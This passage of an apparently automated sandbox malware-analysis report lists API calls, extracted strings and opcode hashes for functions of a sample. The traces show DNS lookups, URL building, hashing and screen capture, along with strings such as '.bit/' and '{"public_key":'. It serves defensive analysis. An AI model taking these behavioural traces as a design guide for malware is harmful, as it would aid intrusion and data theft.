                                                                                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 704684250-3586605218
                                                                                                                                                                        • Opcode ID: 3f0716d83c2f8c92e2611cc188f433534ef7df38c7f255d1e098a337c591b0c5
                                                                                                                                                                        • Instruction ID: 4f9d3703738f9bc7d4aa755254a47c57f43a903b6c438da52fe7ffba9aedf5ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f0716d83c2f8c92e2611cc188f433534ef7df38c7f255d1e098a337c591b0c5
                                                                                                                                                                        • Instruction Fuzzy Hash: FA42C271508341AFDB20DF24CC89BAF7BE8AF86304F04096DF49597292DB75D649CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9DD40 Relevance: 46.2, APIs: 22, Strings: 4, Instructions: 735stringnetworkmemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00B9DD8D
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00B9DDB6
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9DDE4
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00B9DE0A
                                                                                                                                                                        • gethostbyname.WS2_32(00C90134), ref: 00B9DEA7
                                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00B9DEC7
                                                                                                                                                                          • Part of subcall function 00BDF26C: std::exception::exception.LIBCMT ref: 00BDF27F
                                                                                                                                                                          • Part of subcall function 00BDF26C: __CxxThrowException@8.LIBCMT ref: 00BDF294
                                                                                                                                                                          • Part of subcall function 00BDF26C: std::exception::exception.LIBCMT ref: 00BDF2AD
                                                                                                                                                                          • Part of subcall function 00BDF26C: __CxxThrowException@8.LIBCMT ref: 00BDF2C2
                                                                                                                                                                          • Part of subcall function 00BDF26C: std::regex_error::regex_error.LIBCPMT ref: 00BDF2D4
                                                                                                                                                                          • Part of subcall function 00BDF26C: __CxxThrowException@8.LIBCMT ref: 00BDF2E2
                                                                                                                                                                          • Part of subcall function 00BDF26C: std::exception::exception.LIBCMT ref: 00BDF2FB
                                                                                                                                                                          • Part of subcall function 00BDF26C: __CxxThrowException@8.LIBCMT ref: 00BDF310
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9DF8C
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9DFFC
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00B9E06C
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008), ref: 00B9E07E
                                                                                                                                                                        • inet_addr.WS2_32(?), ref: 00B9E0C1
                                                                                                                                                                        • DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 00B9E0E5
                                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00B9E103
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9E33B
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9E40F
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00B9E495
                                                                                                                                                                        • DnsFree.DNSAPI(?,00000001), ref: 00B9E4A0
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9E4BC
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,http://), ref: 00B9E4D0
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000000), ref: 00B9E523
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00B9E549
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00B9E56A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
                                                                                                                                                                        • String ID: http://$https://$invalid string position$vector<T> too long
                                                                                                                                                                        • API String ID: 2428799424-3687932381
                                                                                                                                                                        • Opcode ID: 21451f31f9dd01244ac7a3cdfef7aec909ecf10652bfd0867c4dcfb8153e5fc3
                                                                                                                                                                        • Instruction ID: e8263a0e8e2924434ddebdb8d471da97b8a5c22b662b3754b7d933734234568d
                                                                                                                                                                        • Opcode Fuzzy Hash: 21451f31f9dd01244ac7a3cdfef7aec909ecf10652bfd0867c4dcfb8153e5fc3
                                                                                                                                                                        • Instruction Fuzzy Hash: 7552DF71A002199FCF24CF68C8957AEBBF5FF14304F1445A9E816AB342E771DA45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA0FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00BA1010
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA1026
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00BA103B
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA1051
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00BA1059
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00BA1064
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA107A
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00BA1099
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA10AB
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA10CA
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00BA10DE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA10F0
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA1100
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA110B
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00BA112E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00BA113C
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00BA1154
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00BA115F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 2451520719-213608013
                                                                                                                                                                        • Opcode ID: 62d93e7458f4a16408898b33f8cdf578603fd0614c30515b3a8d0c32f82098f3
                                                                                                                                                                        • Instruction ID: 5e55dc9d5364a0eff125a86d7b613ef1136a542d7573d289c6d3afac98b65ac2
                                                                                                                                                                        • Opcode Fuzzy Hash: 62d93e7458f4a16408898b33f8cdf578603fd0614c30515b3a8d0c32f82098f3
                                                                                                                                                                        • Instruction Fuzzy Hash: 89516C71D40319ABDF10EBA4DC86FEFBBB8EB04745F100465FA01B6280E7755A058BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA1915
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00BA1932
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1941
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1948
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00BA1956
                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00BA1962
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00BA1974
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00BA198B
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00C90260), ref: 00BA1993
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00BA1999
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00BA19A3
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA19B8
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00BA19DC
                                                                                                                                                                          • Part of subcall function 00BA2BA0: lstrlenW.KERNEL32(?), ref: 00BA2BC9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1A01
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00BA1A04
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                        • String ID: failed with error
                                                                                                                                                                        • API String ID: 4182478520-946485432
                                                                                                                                                                        • Opcode ID: 48dd966b9bb8dd4f481516d0143f2dc0f911bd1b442e3f3719ce00d2d5cc52a7
                                                                                                                                                                        • Instruction ID: c7857a1aa1a77c8b68f93f7c6caa31748d4ae4544756b2fd447c8f8c62e2413a
                                                                                                                                                                        • Opcode Fuzzy Hash: 48dd966b9bb8dd4f481516d0143f2dc0f911bd1b442e3f3719ce00d2d5cc52a7
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A21D835640318BFE7116BA49C89FAF7A78EF85B12F100055FA05B22D0DE741D41DBE5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1ACA
                                                                                                                                                                          • Part of subcall function 00BA1AB0: DispatchMessageW.USER32(?), ref: 00BA1AE0
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1AEE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 00B9F900
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9F9EA
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00B9FA51
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9FADA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                        • Opcode ID: 15677df9ac390bba5ad2c22c2bc3bce798f2a7cce94329506637c424f9bef8d1
                                                                                                                                                                        • Instruction ID: b8718663ead94f1fe94cde574d1c5c9222d9a343e9e679915682f07c6d0773fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 15677df9ac390bba5ad2c22c2bc3bce798f2a7cce94329506637c424f9bef8d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F527D71D00209DBDF20DFA8C885BEEB7F5EF15314F2081B9E419A7251E775AA48CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00C8FCA4,00000000,00000000), ref: 00B9E8CE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E8E4
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00B9E8F9
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E90F
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00B9E928
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E93E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00B9E95D
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E96F
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9E98E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00B9E9A2
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E9B4
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9E9D3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1084002244-213608013
                                                                                                                                                                        • Opcode ID: 6795612420673fe2c069ff2a48bf07b587ee9cd01c519c5d64f376c574b249b4
                                                                                                                                                                        • Instruction ID: e12b4a683aeedfc4ec2e2f72e039dad23af2cc22368a4968f6c5852d6a3d2e11
                                                                                                                                                                        • Opcode Fuzzy Hash: 6795612420673fe2c069ff2a48bf07b587ee9cd01c519c5d64f376c574b249b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 55515D71D40209EBEF11EFA4CC46FFEBBB8EB14705F104569F911B6181D7B5AA058BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00C8FCA4,00000000), ref: 00B9EB01
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB17
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00B9EB2C
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB42
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 00B9EB4E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB64
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 00B9EB83
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB95
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9EBB4
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00B9EBC8
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EBDA
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9EBF4
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00B9EC44
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00B9EC4F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1637485200-213608013
                                                                                                                                                                        • Opcode ID: a245c9750c5ab4af8704f0eb7e4748159f467a488a5dd0eb8f8507b7befd8ec1
                                                                                                                                                                        • Instruction ID: ac2bf976666d0c891a1f42276aea93649bba61f3f60f1414cc972cf31bb9f377
                                                                                                                                                                        • Opcode Fuzzy Hash: a245c9750c5ab4af8704f0eb7e4748159f467a488a5dd0eb8f8507b7befd8ec1
                                                                                                                                                                        • Instruction Fuzzy Hash: CC515071E40309ABDF11DBA4CC86FEEBBB8EB44745F100469F901B7181E775AA058BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C122E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00BE4B72), ref: 00BE49C7
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BE49D7
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetDesktopWindow.USER32 ref: 00BE49FB
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetProcessWindowStation.USER32(?,00BE4B72), ref: 00BE4A01
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00BE4B72), ref: 00BE4A1C
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetLastError.KERNEL32(?,00BE4B72), ref: 00BE4A2A
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00BE4B72), ref: 00BE4A65
                                                                                                                                                                          • Part of subcall function 00BE49A0: _wcsstr.LIBCMT ref: 00BE4A8A
                                                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C12316
                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00C12323
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00C12338
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00C12341
                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00C1234E
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00C1235C
                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00C1236E
                                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00C123CA
                                                                                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00C123D6
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00C12436
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00C1243D
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00C1244A
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00C12450
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                                        • API String ID: 151064509-1805842116
                                                                                                                                                                        • Opcode ID: b1c439f6932b88ecaadf07a0bc1e1c32a7f71427046d194defa802e4ff3f9874
                                                                                                                                                                        • Instruction ID: 21fd5e90011dca033dc27df1ed4043c29bd3cb0164a69ec04d5b2d0b8bd66d1b
